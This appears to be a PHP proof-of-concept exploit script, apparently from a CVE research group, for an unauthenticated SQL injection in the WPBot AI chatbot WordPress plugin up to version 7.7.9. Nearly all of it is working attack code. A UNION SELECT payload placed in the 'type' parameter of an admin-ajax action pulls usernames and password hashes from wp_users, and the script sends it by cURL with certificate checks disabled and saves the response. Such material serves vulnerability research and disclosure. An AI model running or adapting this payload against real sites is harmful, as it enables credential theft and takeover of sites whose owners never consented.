// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32499 - WPBot – AI ChatBot for Live Support, Lead Generation, AI Services <= 7.7.9 - Unauthenticated SQL Injection

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// Exploit parameters
$action = 'wpbo_search_site_pagination';

// SQL injection payload to extract admin credentials
// Uses UNION injection with column count matching the original query
$malicious_type = "post') UNION SELECT NULL,user_login,user_pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM wp_users WHERE 1=1--";

$post_data = [
    'action' => $action,
    'type' => $malicious_type,  // Injected into post_type parameter
    'keyword' => 'test',        // Normal search term
    'page' => '0'               // Pagination parameter
];

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check response
if ($http_code == 200) {
    echo "[+] Exploit sent successfully\n";
    echo "[+] Response length: " . strlen($response) . " bytes\n";
    
    // Parse JSON response
    $json_response = json_decode($response, true);
    
    if ($json_response && isset($json_response['html'])) {
        echo "[+] Response contains HTML data\n";
        // The injected SQL results may appear in the HTML output
        // Look for username/password patterns in the response
        if (preg_match('/[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/', $json_response['html'], $matches)) {
            echo "[+] Possible email addresses found in response\n";
        }
        
        // Save response for manual inspection
        file_put_contents('cve-2026-32499-response.html', $json_response['html']);
        echo "[+] Response saved to cve-2026-32499-response.html\n";
    } else {
        echo "[-] Invalid JSON response or missing HTML field\n";
        echo "Raw response: " . substr($response, 0, 500) . "...\n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_code\n";
}

curl_close($ch);

?>
